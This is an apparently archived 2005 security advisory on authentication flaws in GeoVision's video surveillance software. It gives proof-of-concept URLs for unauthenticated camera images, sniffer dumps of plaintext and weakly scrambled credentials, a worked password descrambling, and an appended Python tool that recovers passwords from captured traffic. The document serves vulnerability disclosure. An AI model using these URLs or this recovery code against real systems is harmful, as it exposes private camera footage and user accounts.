[NT] GeoVision Digital Video Surveillance System Multiple Privilege Escalation

From: SecuriTeam (support_at_securiteam.com)
Date: 05/11/05

    To: list@securiteam.com
    Date: 11 May 2005 15:17:59 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      GeoVision Digital Video Surveillance System Multiple Privilege Escalation
    ------------------------------------------------------------------------

    SUMMARY

    "The <http://www.geovision.com.tw/> GeoVision Digital Video Surveillance
    System is a PCI card based digital video surveillance range for Microsoft
    Windows platforms. The GeoVision system is expandable to support POS,
    Central Monitoring Station and License Plate Recognition Systems. The
    GeoVision system is in use in commercial and residential installations
    worldwide."

    Multiple issues have been found in the GeoVision Digital Video Surveillance
    System. These vulnerabilities revolve around poor authentication
    mechanisms: sniffed authentication credentials can be reused as-is, or
    unscrambled to recover the original password. In certain configurations,
    still pictures from security cameras can be viewed without providing any
    authentication.

    DETAILS

    Vulnerable Systems:
     * GeoVision Digital Video Surveillance System version 7.0 and prior

    Privilege Escalation 1:
    When the GeoVision software is set to create JPEG images for use via the
    JPEG Image Viewer it can be seen that no authentication is required to
    view the JPEG images.

    Using GeoVision's own demonstration as an example, the following URLs can be
    used to access images. This is true even for servers that specify that a
    username and password are required for authentication. In the current
    GeoVision demonstration only a username is required to access footage.
    This method works on GeoVision systems that are configured to create JPEG
    images. It also works on GeoVision systems that are not configured with
    the 'Enhanced Network Security' feature, which is understood to be the
    default setting.

    Proof of Concept:
    http://webcam.geovision.com.tw/cam0.jpg
    ..
    http://webcam.geovision.com.tw/cam3.jpg

    Privilege Escalation 2:
    During the authentication phase using the live playback client it was seen
    that the username part of the authentication component is passed in plain
    text. In this partial dump taken using tcpflow the username is seen to be
    'gvUser'.

    Network dump of an authentication attempt:
    --------------------- Network traffic sniffer ---------------------
    192.168.105.136:01187-192.168.105.130:00514: ....
    192.168.105.130:04550-192.168.105.136:01186: RDY.
    192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
    192.168.105.130:04550-192.168.105.136:01186: ...
    192.168.105.136:01186-192.168.105.130:04550: 2.
    -------------------------------------------------------------------

    A simple transformation of the password based on hex values for ASCII
    characters is used to scramble the password. This scrambling is simple to
    do in reverse, as seen in the example below.

    Sniff from network:
    --------------------- Network traffic sniffer ---------------------
    192.168.105.130:04550-192.168.105.136:01186: RDY.
    192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser.
    192.168.105.130:04550-192.168.105.136:01186: ...
    -------------------------------------------------------------------

    Here we see the username 'gvUser', still in plain text, and the scrambled
    password '7d6a6666636e'. To go from the scrambled string back to the
    original password, a few simple steps are performed.

    Split the string into pairs of hex strings:
    0x7d
    0x6a
    0x66
    0x66
    0x63
    0x6e

    Each pair represents one character in the original password, so this
    scrambled string is for a password of 6 characters.

    Iterate through the pairs, subtracting a decreasing value from each:
    subtract 0x6 from the first pair (because the password has 6 characters),
    0x5 from the second, and so on down to 0x1 for the last pair.

    0x7d - 0x6 = 0x77
    0x6a - 0x5 = 0x65
    0x66 - 0x4 = 0x62
    0x66 - 0x3 = 0x63
    0x63 - 0x2 = 0x61
    0x6e - 0x1 = 0x6d

    Then use an ASCII table to translate the values into characters:

    0x77 = w
    0x65 = e
    0x62 = b
    0x63 = c
    0x61 = a
    0x6d = m

    So the original password was 'webcam'.
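    The descrambling steps above, worked as a small Python helper that is added here and is not part of the advisory or of GeoVision's software. It parses the tcpflow line from the dump above (assuming the `..<hex>.<username>.` framing seen there), and implements both directions of the transformation so the round trip can be checked; the framing regex and the function names are assumptions.

```python
import re

# Flow line copied from the advisory's tcpflow dump above. tcpflow prints
# non-printable bytes as dots, so the framing bytes around the fields show as '.'.
AUTH_LINE = "192.168.105.136:01186-192.168.105.130:04550: ..7d6a6666636e.gvUser."

# Assumed framing: <dots><scrambled hex><dot><username><dot> at the end of the line.
_AUTH_RE = re.compile(r"\.+([0-9a-fA-F]+)\.([A-Za-z0-9_]+)\.$")


def parse_auth_line(line: str):
    """Return (username, scrambled_hex) from a tcpflow line, or None if it
    does not carry the authentication framing (e.g. the 'RDY.' banner)."""
    m = _AUTH_RE.search(line.strip())
    if not m:
        return None
    scrambled, username = m.group(1), m.group(2)
    return username, scrambled.lower()


def scramble(password: str) -> str:
    """The transformation the advisory describes, run forwards: add (n - i) to
    the i-th character's ASCII code, where n is the password length, and emit
    two hex digits per character."""
    n = len(password)
    return "".join(f"{ord(c) + (n - i):02x}" for i, c in enumerate(password))


def descramble(scrambled: str) -> str:
    """Invert scramble(): split into hex pairs, subtract (n - i) from pair i.
    The subtrahend depends only on position, so no secret is involved and the
    'scrambling' offers no more protection than plaintext."""
    if len(scrambled) % 2 != 0:
        raise ValueError("scrambled string must consist of whole hex pairs")
    pairs = [int(scrambled[i:i + 2], 16) for i in range(0, len(scrambled), 2)]
    n = len(pairs)
    return "".join(chr(v - (n - i)) for i, v in enumerate(pairs))


def recover_from_dump(line: str):
    """Parse one sniffer line and return (username, password), or None."""
    parsed = parse_auth_line(line)
    if parsed is None:
        return None
    username, scrambled = parsed
    return username, descramble(scrambled)


if __name__ == "__main__":
    print(recover_from_dump(AUTH_LINE))  # ('gvUser', 'webcam')
```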

    This issue is encountered for all of the authentication options below:

    Mpeg4 Encoder Viewer
     * 56kMpegView0.htm
     * LanMpegView0.htm
     * MultiView.htm

    Remote Play Back
     * PlayBackX.htm

    Emap
     * Emap.htm

    For the JPEG Image Viewer (JPGLogin.htm) the authentication credentials
    are passed using the HTTP POST method completely in plain text. Scrambling
    is not used - see below.

    --------------------- Network traffic sniffer ---------------------
    192.168.105.130:34707-192.168.105.136:80 POST /password HTTP/1.1
    Accept: image/gif, image/jpeg, image/pjpeg, */*
    Referer: http://192.168.105.136/JPGLogin.htm
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
    Host: 192.168.1.5
    Content-Length: 37
    Connection: Keep-Alive
    Cache-Control: no-cache

    id=gvUser&pwd=webcam&send=Submit
    -------------------------------------------------------------------

    Here the id= value is the username and the pwd= value is the password.

    Vendor Status:
    In version 7.0 the vendor added a section known as 'Enhanced Network
    Security' that is supposed to help fix this issue, but this option is not
    enabled by default.

    ADDITIONAL INFORMATION

    The information has been provided by Tirath Rai <mailto:tirath@esqo.com>.


